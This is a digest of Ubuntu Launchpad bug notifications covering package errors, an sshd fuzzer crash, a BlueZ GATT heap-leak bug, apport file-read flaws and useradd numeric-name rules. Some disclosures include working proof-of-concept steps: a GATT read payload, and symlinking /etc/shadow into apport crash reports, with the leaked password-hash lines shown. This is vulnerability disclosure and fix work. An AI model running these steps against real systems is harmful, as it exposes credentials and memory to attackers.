  -rw-r--r-- 1 root root 629 May 28 06:17 /etc/default/isc-dhcp-server
[Touch-packages] [Bug 1930209] Re: Could not open file /var/lib/update-notifier/package-data- downloads/partial/verdan32.exe - open (40: Too many levels of symbolic links)
** Summary changed: - sudo apt install timeshift Reading package lists... Done Building dependency treeReading state information... Done The following NEW packages will be installed: timeshift 0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded. 1 not fully installed or removed. Need to get 640 kB of archives. After this operation, 3,323 kB of additional disk space will be used. Get:1 http://np.archive.ubuntu.com/ubuntu focal/universe amd64 timeshift amd64 20.03+ds-2 [640 kB] Fetched 640 kB in 6s (115 kB/s) Selecting previously unselected package timeshift. (Reading database ... 191451 files and directories currently installed.) Preparing to unpack .../timeshift_20.03+ds-2_amd64.deb ... Unpacking timeshift (20.03+ds-2) ... Setting up timeshift (20.03+ds-2) ... Setting up update-notifier-common (3.192.30.7) ... ttf-mscorefonts-installer: processing... ttf-mscorefonts-installer: downloading http://downloads.sourceforge.net/corefont s/andale32.exe /usr/lib/update-notifier/package-data-downloader:185: DeprecationWarning: apt_pk g.sha256sum is deprecated, use apt_pkg.Hashes real_sha256 = apt_pkg.sha256sum(dest_file_obj) ttf-mscorefonts-installer: downloading http://downloads.sourceforge.net/corefont s/arial32.exe ttf-mscorefonts-installer: downloading http://downloads.sourceforge.net/corefont s/arialb32.exe ttf-mscorefonts-installer: downloading http://downloads.sourceforge.net/corefont s/comic32.exe ttf-mscorefonts-installer: downloading http://downloads.sourceforge.net/corefont s/courie32.exe ttf-mscorefonts-installer: downloading http://downloads.sourceforge.net/corefont s/georgi32.exe Get:1 http://downloads.sourceforge.net/corefonts/georgi32.exe [392 kB] Fetched 392 kB in 8s (46.6 kB/s) ttf-mscorefonts-installer: downloading http://downloads.sourceforge.net/corefont s/impact32.exe Get:1 http://downloads.sourceforge.net/corefonts/impact32.exe [173 kB] Fetched 173 kB in 20s (8,707 B/s) ttf-mscorefonts-installer: downloading 
http://downloads.sourceforge.net/corefont s/times32.exe Get:1 http://downloads.sourceforge.net/corefonts/times32.exe [662 kB] Fetched 662 kB in 35s (19.1 kB/s) ttf-mscorefonts-installer: downloading http://downloads.sourceforge.net/corefont s/trebuc32.exe Get:1 http://downloads.sourceforge.net/corefonts/trebuc32.exe [357 kB] Fetched 357 kB in 21s (16.8 kB/s) ttf-mscorefonts-installer: downloading http://downloads.sourceforge.net/corefont s/verdan32.exe Err:1 http://downloads.sourceforge.net/corefonts/verdan32.exe Could not open file /var/lib/update-notifier/package-data-downloads/partial/ve rdan32.exe - open (40: Too many levels of symbolic links) [IP: 203.135.147.10 44 3] E: Failed to fetch https://udomain.dl.sourceforge.net/project/corefonts/the font s/final/verdan32.exe Could not open file /var/lib/update-notifier/package-data- downloads/partial/verdan32.exe - open (40: Too many levels of symbolic links) [I P: 203.135.147.10 443] E: Download Failed Processing triggers for desktop-file-utils (0.24-1ubuntu3) ... Processing triggers for mime-support (3.64ubuntu1) ... Processing triggers for hicolor-icon-theme (0.17-2) ... Processing triggers for gnome-menus (3.36.0-1ubuntu1) ... Processing triggers for man-db (2.9.1-1) ... + Could not open file /var/lib/update-notifier/package-data- downloads/partial/verdan32.exe - open (40: Too many levels of symbolic links) ** Description changed: app installation is not properly fixed files arenot properly installed and it gives alot of error + + === from title === + sudo apt install timeshift Reading package lists... Done Building dependency treeReading state information... Done The following NEW packages will be installed: timeshift 0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded. 1 not fully installed or removed. Need to get 640 kB of archives. After this operation, 3,323 kB of additional disk space will be used. 
Get:1 http://np.archive.ubuntu.com/ubuntu focal/universe amd64 timeshift amd64 20.03+ds-2 [640 kB] Fetched 640 kB in 6s (115 kB/s) Selecting previously unselected package timeshift. (Reading database ... 191451 files and directories currently installed.) Preparing to unpack .../timeshift_20.03+ds-2_amd64.deb ... Unpacking timeshift (20.03+ds-2) ... Setting up timeshift (20.03+ds-2) ... Setting up update-notifier-common (3.192.30.7) ... ttf-mscorefonts-installer: processing... ttf-mscorefonts-installer: downloading http://downloads.sourceforge.net/corefont s/andale32.exe /usr/lib/update-notifier/package-data-downloader:185: DeprecationWarning: apt_pk g.sha256sum is deprecated, use apt_pkg.Hashes real_sha256 = apt_pkg.sha256sum(dest_file_obj) ttf-mscorefonts-installer:
[Touch-packages] [Bug 1930301] Re: package libpam0g:amd64 1.3.1-5ubuntu4.2 failed to install/upgrade: installed libpam0g:amd64 package post-installation script subprocess returned error exit status 1
** Also affects: debconf (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to pam in Ubuntu. https://bugs.launchpad.net/bugs/1930301 Title: package libpam0g:amd64 1.3.1-5ubuntu4.2 failed to install/upgrade: installed libpam0g:amd64 package post-installation script subprocess returned error exit status 1 Status in debconf package in Ubuntu: New Status in pam package in Ubuntu: New Bug description: My laptop system continuously pops the message system crashed ProblemType: Package DistroRelease: Ubuntu 20.04 Package: libpam0g:amd64 1.3.1-5ubuntu4.2 ProcVersionSignature: Ubuntu 5.8.0-53.60~20.04.1-generic 5.8.18 Uname: Linux 5.8.0-53-generic x86_64 ApportVersion: 2.20.11-0ubuntu27.18 Architecture: amd64 CasperMD5CheckResult: skip Date: Mon May 31 22:05:36 2021 DuplicateSignature: package:libpam0g:amd64:1.3.1-5ubuntu4.2 Setting up libpam0g:amd64 (1.3.1-5ubuntu4.2) ... debconf: DbDriver "config": /var/cache/debconf/config.dat is locked by another process: Resource temporarily unavailable dpkg: error processing package libpam0g:amd64 (--configure): installed libpam0g:amd64 package post-installation script subprocess returned error exit status 1 ErrorMessage: installed libpam0g:amd64 package post-installation script subprocess returned error exit status 1 InstallationDate: Installed on 2020-08-08 (296 days ago) InstallationMedia: Ubuntu 20.04.1 LTS "Focal Fossa" - Release amd64 (20200731) Python3Details: /usr/bin/python3.8, Python 3.8.5, python3-minimal, 3.8.2-0ubuntu2 PythonDetails: /usr/bin/python2.7, Python 2.7.18, python-is-python2, 2.7.17-4 RelatedPackageVersions: dpkg 1.19.7ubuntu3 apt 2.0.4 SourcePackage: pam Title: package libpam0g:amd64 1.3.1-5ubuntu4.2 failed to install/upgrade: installed libpam0g:amd64 package post-installation script subprocess returned error exit status 1 UpgradeStatus: No upgrade log present (probably fresh install) To manage 
notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/debconf/+bug/1930301/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1930286] Re: Defensics' synopsys fuzzer testing tool cause openssh to segfault
Hello Eric, thanks for doing the research on this issue. Does the coredump look like this may be exploitable in some fashion? Is the crash something that affects anything beyond the specific process serving the client in question?

Thanks

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1930286

Title:
  Defensics' synopsys fuzzer testing tool cause openssh to segfault

Status in openssh package in Ubuntu:
  New
Status in openssh source package in Xenial:
  New

Bug description:
  Here's what has been brought to my attention by a UA customer:

  * Release: Xenial/16.04LTS
  * Openssh version: 7.2p2-4ubuntu2.10
  * Fuzzer tool used: https://www.synopsys.com/software-integrity/security-testing/fuzz-testing.html (proprietary software)

  As of today, I have no access to a reproducer. Still working on getting access to one (if possible) in order to better understand what the failing test scenario is doing.

  * coredump:

  $ gdb $(which sshd) core.cic-1.domain.tld.1612566260.sshd.20731
  ...
  Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
  Core was generated by `sshd: [net] '.
  Program terminated with signal SIGSEGV, Segmentation fault.
  #0 __memcpy_avx_unaligned () at ../sysdeps/x86_64/multiarch/memcpy-avx-unaligned.S:136
  136 ../sysdeps/x86_64/multiarch/memcpy-avx-unaligned.S: No such file or directory.
  (gdb) bt
  #0 __memcpy_avx_unaligned () at ../sysdeps/x86_64/multiarch/memcpy-avx-unaligned.S:136
  #1 0x7fec25b241db in memcpy (__len=, __src=0x0, __dest=) at /usr/include/x86_64-linux-gnu/bits/string3.h:53
  #2 aes_gcm_ctrl (c=0x558a7ae19758, type=, arg=, ptr=0x0) at e_aes.c:1189
  #3 0x7fec25b20897 in EVP_CIPHER_CTX_ctrl (ctx=ctx@entry=0x558a7ae19758, type=type@entry=18, arg=arg@entry=-1, ptr=ptr@entry=0x0) at evp_enc.c:619
  #4 0x558a7953f54c in cipher_init (cc=cc@entry=0x558a7ae19750, cipher=0x558a797b3ef0 , key=0x0, keylen=32, iv=0x0, ivlen=, do_encrypt=0) at ../cipher.c:336
  #5 0x558a7954521a in ssh_set_newkeys (ssh=ssh@entry=0x558a7ae18ef0, mode=mode@entry=0)at ../packet.c:919
  #6 0x558a7955ae92 in kex_input_newkeys (type=, seq=, ctxt=0x558a7ae18ef0)at ../kex.c:434
  #7 0x558a7954d269 in ssh_dispatch_run (ssh=ssh@entry=0x558a7ae18ef0, mode=0, done=0x558a7ae18278, ctxt=0x558a7ae18ef0) at ../dispatch.c:119
  #8 0x558a7954d2b9 in ssh_dispatch_run_fatal (ssh=0x558a7ae18ef0, mode=, done=, ctxt=) at ../dispatch.c:140
  #9 0x558a79502770 in do_ssh2_kex () at ../sshd.c:2744
  #10 main (ac=, av=) at ../sshd.c:2301
  (gdb)
[Touch-packages] [Bug 1926548] Re: The gatt protocol has out-of-bounds read that leads to information leakage
** Information type changed from Private Security to Public Security

--
https://bugs.launchpad.net/bugs/1926548

Title:
  The gatt protocol has out-of-bounds read that leads to information leakage

Status in bluez package in Ubuntu:
  New

Bug description:
  I installed the latest bluez 5.53-0ubuntu3 version using apt-get install.
  It seems that this vulnerability was silently fixed in the latest bluez5.8,
  and the cve number was not assigned.
  But this vulnerability now affects the latest ubuntu system

  This vulnerability allows an attacker to remotely obtain most of the
  contents of the heap without authentication.
  The vulnerability code is stored in cli_feat_read_cb, this function does
  not verify the offset parameter

  The vulnerability code is as follows

  gatt-database.c 1054:

  static void cli_feat_read_cb(struct gatt_db_attribute *attrib,
                               unsigned int id, uint16_t offset,
                               uint8_t opcode, struct bt_att *att,
                               void *user_data){
  ...
          len = sizeof(state->cli_feat)-offset;
          value = len ? &state->cli_feat[offset] : NULL;

  done:
          gatt_db_attribute_read_result(attrib, id, ecode, value, len);
  }

  len will become very large due to integer overflow, so that a message of
  mtu (0x90) size will be sent later
  The message content is the buffer pointed to by value, which can be most
  addresses on the heap

  poc is very simple, the core is this line of code

  memcpy(&buf[0],"\x0c\x0b\x00\x0d\x00",5);

  0xc stands for read
  \x0b\x00 represents the handle of the client feature, which can be
  obtained through the find info message, which seems to be 0b by default
  \x0d\x00 is offset 0xd

  this vulnerability is serious

  I want to apply for a cve number, although this has been silently fixed
  in the latest version
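The unchecked length computation quoted in the report, beside one possible bounds check, as an added example (not BlueZ code and not the upstream patch). The one-byte `cli_feat` array, the `read_result` struct, the function names and the MTU clamp are assumptions made for illustration; the model only computes lengths and never reads out of bounds.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define ATT_ERROR_INVALID_OFFSET 0x07 /* ATT "Invalid Offset" error code */
#define ATT_MTU 0x90                  /* MTU value quoted in the report */
#define CLI_FEAT_SIZE 1               /* assumed size of state->cli_feat */

/* Stand-in for the per-device state that holds the client features. */
struct device_state_model {
    uint8_t cli_feat[CLI_FEAT_SIZE];
};

struct read_result {
    uint8_t ecode; /* 0 on success, ATT error code otherwise */
    size_t start;  /* index into cli_feat where the returned value begins */
    size_t len;    /* byte count handed on to the read-result call */
};

/* Length computation as quoted in the report: offset is never validated. */
static struct read_result read_unchecked(const struct device_state_model *state,
                                         uint16_t offset)
{
    struct read_result r = { 0, offset, 0 };

    /* sizeof yields size_t, so the subtraction is unsigned and wraps
     * around to a huge value as soon as offset exceeds the array size. */
    r.len = sizeof(state->cli_feat) - offset;
    return r;
}

/* Same computation with the offset validated first. */
static struct read_result read_checked(const struct device_state_model *state,
                                       uint16_t offset)
{
    struct read_result r = { 0, 0, 0 };

    if (offset > sizeof(state->cli_feat)) {
        r.ecode = ATT_ERROR_INVALID_OFFSET;
        return r;
    }
    r.start = offset;
    r.len = sizeof(state->cli_feat) - offset; /* cannot wrap any more */
    return r;
}

/* Bytes beyond the end of cli_feat that a response would cover once the
 * length is clamped to one PDU (simplified: MTU minus the opcode byte). */
static size_t bytes_past_end(struct read_result r, size_t mtu)
{
    size_t sent, end;

    if (r.ecode != 0 || r.len == 0)
        return 0;
    sent = r.len < mtu - 1 ? r.len : mtu - 1;
    end = r.start + sent;
    return end > CLI_FEAT_SIZE ? end - CLI_FEAT_SIZE : 0;
}

int main(void)
{
    struct device_state_model state = { { 0 } };
    const uint16_t offsets[] = { 0x00, 0x01, 0x02, 0x0d };

    for (size_t i = 0; i < sizeof(offsets) / sizeof(offsets[0]); i++) {
        struct read_result u = read_unchecked(&state, offsets[i]);
        struct read_result c = read_checked(&state, offsets[i]);

        printf("offset 0x%02x: unchecked len=%zu past_end=%zu | "
               "checked ecode=0x%02x len=%zu past_end=%zu\n",
               (unsigned)offsets[i], u.len, bytes_past_end(u, ATT_MTU),
               (unsigned)c.ecode, c.len, bytes_past_end(c, ATT_MTU));
    }
    return 0;
}
```

An offset equal to the array size is still accepted by the checked version and yields a zero-length value, which matches the `value = len ? ... : NULL` branch in the quoted code.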
[Touch-packages] [Bug 1926548] Re: The gatt protocol has out-of-bounds read that leads to information leakage
Daniel, are you sure about that fixed-in-5.56 bug tag? I can't spot the
referenced commit in the tarballs 5.55, 5.56, 5.57, 5.58 from:
http://www.bluez.org/

nor in the github sources:
https://github.com/bluez/bluez/blob/master/src/gatt-database.c#L1054

nor the kernel.org sources:
https://git.kernel.org/pub/scm/bluetooth/bluez.git/tree/src/gatt-database.c#n1054

Thanks

--
https://bugs.launchpad.net/bugs/1926548

Title:
  The gatt protocol has out-of-bounds read that leads to information leakage

Status in Bluez Utilities:
  Fix Released
Status in bluez package in Ubuntu:
  Fix Released
Status in bluez source package in Hirsute:
  Fix Released
Status in bluez source package in Impish:
  Fix Released
[Touch-packages] [Bug 1926548] Re: The gatt protocol has out-of-bounds read that leads to information leakage
Wonderful, thanks Daniel!

--
https://bugs.launchpad.net/bugs/1926548

Title:
  The gatt protocol has out-of-bounds read that leads to information leakage

Status in Bluez Utilities:
  Fix Released
Status in bluez package in Ubuntu:
  Fix Released
Status in bluez source package in Hirsute:
  Fix Released
Status in bluez source package in Impish:
  Fix Released
[Touch-packages] [Bug 1917904] Re: Arbitrary file reads
** Information type changed from Private Security to Public Security

--
https://bugs.launchpad.net/bugs/1917904

Title:
  Arbitrary file reads

Status in apport package in Ubuntu:
  Fix Released
Status in apport source package in Bionic:
  Fix Released
Status in openjdk-lts source package in Bionic:
  New
Status in apport source package in Focal:
  Fix Released
Status in openjdk-lts source package in Focal:
  New
Status in apport source package in Groovy:
  Fix Released
Status in openjdk-lts source package in Groovy:
  New
Status in apport source package in Hirsute:
  Fix Released
Status in openjdk-lts source package in Hirsute:
  New
Status in apport source package in Impish:
  Fix Released
Status in openjdk-lts source package in Impish:
  New

Bug description:

# Vulnerabilities in Apport

During a cursory code review, several potential security issues in `apport` and crash-related hooks in packages such as `Xorg` and `openjdk-14-lts` have been identified.

While the issue regarding the `openjdk-14-lts` package is exploitable on default installations, the remaining issues most likely are mitigated by the sysctl setting `fs.protected_symlinks` on default Ubuntu installations.

With regard to issues mitigated by `fs.protected_symlinks`, it is not clear if they are considered to be part of the threat model, but nonetheless will be included in this report. Further, if the issues regarding package hooks should be reported in the corresponding packages' bug tracker, please let me know.

## Issue 1: Arbitrary file read in package-hooks/source_openjdk-*.py

The `add_info()` function allows for a directory traversal by building a file path using user-controlled data without properly sanitizing the resulting path.

```Python
def add_info(report, ui=None):
    if report['ProblemType'] == 'Crash' and 'ProcCwd' in report:
        # attach hs_err_.pid file
        cwd = report['ProcCwd']
        pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])
        if pid_line:
            pid = pid_line.groups()[0]
            path = "%s/hs_err_pid%s.log" % (cwd, pid)
            # make sure if exists
            if os.path.exists(path):
                content = read_file(path)
                # truncate if bigger than 100 KB
                # see LP: #1696814
                max_length = 100*1024
                if sys.getsizeof(content) < max_length:
                    report['HotspotError'] = content
                    report['Tags'] += ' openjdk-hs-err'
                else:
                    report['HotspotError'] = content[:max_length] + \
                        "\n[truncated by openjdk-11 apport hook]" + \
                        "\n[max log size is %s, file size was %s]" % \
                        (si_units(max_length), si_units(sys.getsizeof(content)))
                    report['Tags'] += ' openjdk-hs-err'
```

By injecting a `ProcCwd` such as `/home/user/` and a `Pid` such as `0`, the function includes an arbitrary file by following a potential symbolic link `/home/user/hs_err_pid0.log`.

### PoC

```
$ sudo apt install openjdk-14-jdk
$ sudo sysctl fs.protected_symlinks
fs.protected_symlinks = 1
$ ln -s /etc/shadow /home/user/hs_err_pid0.log
$ pid=$'\t0';cat << EOF > /var/crash/poc.crash
ProblemType: Crash
ExecutablePath: /poc
Package: openjdk-lts 123
SourcePackage: openjdk-lts
ProcCwd: /home/user
ProcStatus:
 Pid:$pid
 Uid:$pid
EOF
$ grep -A3 root: /var/crash/poc.crash
root:!:18393:0:9:7:::
daemon:*:18375:0:9:7:::
bin:*:18375:0:9:7:::
sys:*:18375:0:9:7:::
```

## Issue 2: Arbitrary file read in package-hooks/source_xorg.py (Info)

The root cause of this issue stems from the fact, that a potentially user-controlled file in the `/tmp` directory is not checked for being a symbolic link and therefore might allow including arbitrary files in the processed crash report:

Note: Requires `fs.protected_symlinks=0`

```Python
def attach_3d_info(report, ui=None):
    ...
    # Compiz internal state if compiz crashed
    if True or report.get('SourcePackage','Unknown') == "compiz" and "ProcStatus" in report:
        compiz_pid = 0
        pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])
        if pid_line:
            compiz_pid = pid_line.groups()[0]
        compiz_state_file = '/tmp/compiz_internal_state%s' % compiz_pid
        attach_file_if_exists(report, compiz_state_file, "compiz_internal_states")
```

### PoC

```
$ sudo sysctl fs.protected_symlinks=0
fs.protected_symlinks = 0
$ ln -s /etc/shadow /tmp/compiz_internal_state0
$ cat << EOF > /var/crash/poc.crash
ProblemType: Crash
ExecutablePath: /poc
Package: source_xorg 123
SourcePackage: compiz
Proc
```
Re: [Touch-packages] [Bug 1927078] Re: Don't allow useradd to use fully numeric names
On Wed, Jun 16, 2021 at 09:15:32PM -, Steve Langasek wrote:
> Disallowing leading numeric digits entirely would, unfortunately,
> disable a significant class of valid usernames in conflict with
> historical usage.

Admins are still able to hand-edit /etc/passwd, /etc/shadow, and mv home
directory names if they've got a good enough reason to use such names and
trust their software to do the right thing.

> The main motivation in fixing this is that allowing fully-numeric
> usernames means there is ambiguity in contexts that can reference both
> uids and usernames and do not have strong typing. Aside from systemd,
> this is mostly about shells and invocations of various commandline
> tools; and neither bash nor the tools appear to interpret 0o0 or 0x0 as
> numbers:

I was thinking primarily of perl, here:

$ sudo perl -e 'print "muahaa\n" if $< == "0x0";'
muahaa

You could argue that wherever "0x0" came from in this perl program should
have kept track if it received a number or a name, but the language sure
doesn't help.

C examples are less compelling because it has types but the atoi(3) and
strtoul(3) APIs make it very easy to parse something like "2build" or
"4fun" or "0x0" into an integer. (strtol(3) has a nice example.)

> Let's please focus on the known problem case of all-numeric usernames.
> If there are other confirmed security issues with octal/hex
> representations of numbers, then we should also close those, but it
> needs a more precise fix than disabling leading digits.

How strongly do you feel about this? I can see where you're coming from,
but given

(a) the escape hatch mechanism to 'break the rules' isn't too onerous
(b) the ease with which brittle code can be written
(c) the simplicity of 'deny leading digit' compared against 'make sure
    there's at least one non-digit' or 'make sure there's at least one
    letter' etc

I prefer the simpler rule.

Thanks

--
https://bugs.launchpad.net/bugs/1927078

Title:
  Don't allow useradd to use fully numeric names

Status in shadow package in Ubuntu:
  New
Status in shadow source package in Focal:
  New
Status in shadow source package in Groovy:
  New
Status in shadow source package in Hirsute:
  New
Status in shadow source package in Impish:
  New

Bug description:
  [Description]

  Fully numeric names support in Ubuntu is inconsistent in Focal onwards
  because systemd does not like them[1] but are still allowed by default
  by useradd, leaving the session behavior in hands of the running
  applications. Two examples:

  1. After creating a user named "0", the user can log in via ssh or
  console but loginctl won't create a session for it:

  root@focal:/home/ubuntu# useradd -m 0
  root@focal:/home/ubuntu# id 0
  uid=1005(0) gid=1005(0) groups=1005(0)

  ..

  0@192.168.122.6's password:
  Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.8.0-48-generic x86_64)

  Last login: Thu Apr 8 16:17:06 2021 from 192.168.122.1
  $ loginctl
  No sessions.
  $ w
   16:20:09 up 4 min, 1 user, load average: 0.03, 0.14, 0.08
  USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
  0        pts/0    192.168.122.1    16:17    0.00s  0.00s  0.00s w

  And pam-systemd shows the following message:

  Apr 08 16:17:06 focal sshd[1584]: pam_unix(sshd:session): session opened for user 0 by (uid=0)
  Apr 08 16:17:06 focal sshd[1584]: pam_systemd(sshd:session): pam-systemd initializing
  Apr 08 16:17:06 focal sshd[1584]: pam_systemd(sshd:session): Failed to get user record: Invalid argument

  2. With that same username, every successful authentication in gdm
  will loop back to gdm again instead of starting gnome, making the user
  unable to login.

  Making useradd fail (unless --badnames is set) when a fully numeric
  name is used will make the default OS behavior consistent.

  [Other info]

  - Upstream does not support fully numeric usernames
  - useradd has a --badnames parameter that would still allow the use of
    these type of names
[Touch-packages] [Bug 1927078] Re: Don't allow useradd to use fully numeric names
Heh, a comment in Jawn's debdiff:

 * User/group names must match [a-z_][a-z0-9_-]*[$]

I found period also worked fine:

root@u20:~# useradd 0.0
root@u20:~# getent passwd 0.0
0.0:x:1001:1001::/home/0.0:/bin/sh
root@u20:~# userdel 0.0
root@u20:~# getent passwd 0.0
root@u20:~# exit

I know comments are almost always out of date by the time I read them,
but this one seems wronger than usual. :)

--
https://bugs.launchpad.net/bugs/1927078

Title:
  Don't allow useradd to use fully numeric names

Status in shadow package in Ubuntu:
  New
Status in shadow source package in Focal:
  New
Status in shadow source package in Groovy:
  New
Status in shadow source package in Hirsute:
  New
Status in shadow source package in Impish:
  New
[Touch-packages] [Bug 1932342] Re: Feature Request: Rate limit apparmor denial logs
See also https://github.com/snapcrafters/discord/issues/23 -- there may be
some other advice buried in there on how to deal with the deluge while
also not giving discord permission to see all the processes you're
running.

Thanks

** Bug watch added: github.com/snapcrafters/discord/issues #23
   https://github.com/snapcrafters/discord/issues/23

--
https://bugs.launchpad.net/bugs/1932342

Title:
  Feature Request: Rate limit apparmor denial logs

Status in apparmor package in Ubuntu:
  Confirmed

Bug description:
  While running Discord, AppArmor prints a ton of denials every second.
  The lines look something like this:

  > Jun 17 18:00:14 magni audit[267198]: AVC apparmor="DENIED" operation="ptrace" profile="snap.discord.discord" pid=267198 comm="Discord" requested_mask="read" denied_mask="read" peer="unconfined"

  I'm thankful that AppArmor is preventing it from using pthread to mess
  with my system. However, I wish it didn't spam my logs so much. Would
  it be possible to implement a system whereby subsequent identical logs
  within the same second are deduplicated? For example, instead of 127
  separate denials lines, one second could look like this:

  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="ptrace" profile="snap.discord.discord" pid=267198 comm="Discord" requested_mask="read" denied_mask="read" peer="unconfined"
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="open" profile="snap.discord.discord" name="/proc/1383/cmdline" pid=267198 comm="Discord" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="ptrace" profile="snap.discord.discord" pid=267198 comm="Discord" requested_mask="read" denied_mask="read" peer="unconfined"
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" [3 identical messages omitted]
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="open" profile="snap.discord.discord" name="/proc/1407/cmdline" pid=267198 comm="Discord" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="ptrace" profile="snap.discord.discord" pid=267198 comm="Discord" requested_mask="read" denied_mask="read" peer="unconfined"
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" [48 identical messages omitted]
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="ptrace" profile="snap.discord.discord" pid=267198 comm="Discord" requested_mask="read" denied_mask="read" peer="snap.snap-store.ubuntu-software"
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="ptrace" profile="snap.discord.discord" pid=267198 comm="Discord" requested_mask="read" denied_mask="read" peer="unconfined"
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" [15 identical messages omitted]
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="ptrace" profile="snap.discord.discord" pid=267198 comm="Discord" requested_mask="read" denied_mask="read" peer="docker-default"
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="ptrace" profile="snap.discord.discord" pid=267198 comm="Discord" requested_mask="read" denied_mask="read" peer="unconfined"
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="open" profile="snap.discord.discord" name="/proc/14296/cmdline" pid=267198 comm="Discord" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="ptrace" profile="snap.discord.discord" pid=267198 comm="Discord" requested_mask="read" denied_mask="read" peer="unconfined"
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" [8 identical messages omitted]
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="open" profile="snap.discord.discord" name="/proc/93917/cmdline" pid=267198 comm="Discord" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="ptrace" profile="snap.discord.discord" pid=267198 comm="Discord" requested_mask="read" denied_mask="read" peer="unconfined"
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" [40 identical messages omitted]

  Of course, it would've been nice if Discord wasn't persistently trying
  to ptrace everything on my system all the time even after being
  denied, but AppArmor exists to deal with misbehaving applications, so
  we kinda have to expect that the applications it deals with will be
  misbehaving.

  ProblemType: Bug
  DistroRelease: Ubuntu 21.04
  Package: apparmor 3.0.0-0ubuntu7
  ProcVersionSignature: Ubuntu 5.11.0-18.19-generic 5.11.17
  Uname: Linux 5.11.0-18-generic x86_64
  NonfreeKernelModu
[Touch-packages] [Bug 1927078] Re: Don't allow useradd to use fully numeric names
Ah, that explains that. Would you mind adding tests for a few more
usernames?

0root
0
00
0.0
0x0
0-0
0_0
0.o
0xo
0-o
0_o

Thanks

--
https://bugs.launchpad.net/bugs/1927078

Title:
  Don't allow useradd to use fully numeric names

Status in shadow package in Ubuntu:
  New
Status in shadow source package in Focal:
  New
Status in shadow source package in Groovy:
  New
Status in shadow source package in Hirsute:
  New
Status in shadow source package in Impish:
  New
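The strtoul(3) point made earlier in this thread and the test usernames requested above, worked through in C as an added example (not code from shadow or from the debdiff). The two rule functions model only the numeric part of name validation, and all function names are assumptions.

```c
#include <ctype.h>
#include <errno.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>

/* Usernames listed for testing in the thread. */
static const char *const TEST_NAMES[] = {
    "0root", "0", "00", "0.0", "0x0", "0-0", "0_0", "0.o", "0xo", "0-o", "0_o",
};
#define N_TEST_NAMES (sizeof(TEST_NAMES) / sizeof(TEST_NAMES[0]))

/* Brittle pattern: strtoul(3) with base 0 and trailing characters ignored.
 * Returns true when a number was extracted, even from "2build" or "0x0". */
static bool lenient_uid(const char *s, unsigned long *uid)
{
    char *end;

    *uid = strtoul(s, &end, 0);
    return end != s;
}

/* Careful pattern: decimal digits only, whole string must be consumed. */
static bool strict_uid(const char *s, unsigned long *uid)
{
    char *end;

    if (!isdigit((unsigned char)s[0]))
        return false; /* rejects "", signs and leading blanks */
    errno = 0;
    *uid = strtoul(s, &end, 10);
    return errno == 0 && *end == '\0';
}

/* Rule from the bug title: refuse names that consist only of digits. */
static bool allowed_not_all_digits(const char *name)
{
    for (const char *p = name; *p; p++)
        if (!isdigit((unsigned char)*p))
            return true;
    return false; /* empty or fully numeric */
}

/* Simpler rule argued for in the reply: refuse any leading digit. */
static bool allowed_no_leading_digit(const char *name)
{
    return name[0] != '\0' && !isdigit((unsigned char)name[0]);
}

/* Test names a rule accepts that lenient_uid() still reads as uid 0. */
static size_t accepted_but_parsed_as_root(bool (*rule)(const char *))
{
    size_t n = 0;

    for (size_t i = 0; i < N_TEST_NAMES; i++) {
        unsigned long uid;

        if (rule(TEST_NAMES[i]) && lenient_uid(TEST_NAMES[i], &uid) && uid == 0)
            n++;
    }
    return n;
}

int main(void)
{
    printf("%-6s %-8s %-7s %-15s %s\n",
           "name", "lenient", "strict", "not-all-digits", "no-leading-digit");
    for (size_t i = 0; i < N_TEST_NAMES; i++) {
        const char *name = TEST_NAMES[i];
        unsigned long lenient = 0, strict = 0;
        bool l = lenient_uid(name, &lenient);
        bool s = strict_uid(name, &strict);

        printf("%-6s %-8s %-7s %-15s %s\n", name,
               l ? "uid 0" : "name", s ? "uid 0" : "name",
               allowed_not_all_digits(name) ? "accepted" : "refused",
               allowed_no_leading_digit(name) ? "accepted" : "refused");
    }
    printf("accepted yet read as uid 0: not-all-digits=%zu no-leading-digit=%zu\n",
           accepted_but_parsed_as_root(allowed_not_all_digits),
           accepted_but_parsed_as_root(allowed_no_leading_digit));
    return 0;
}
```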
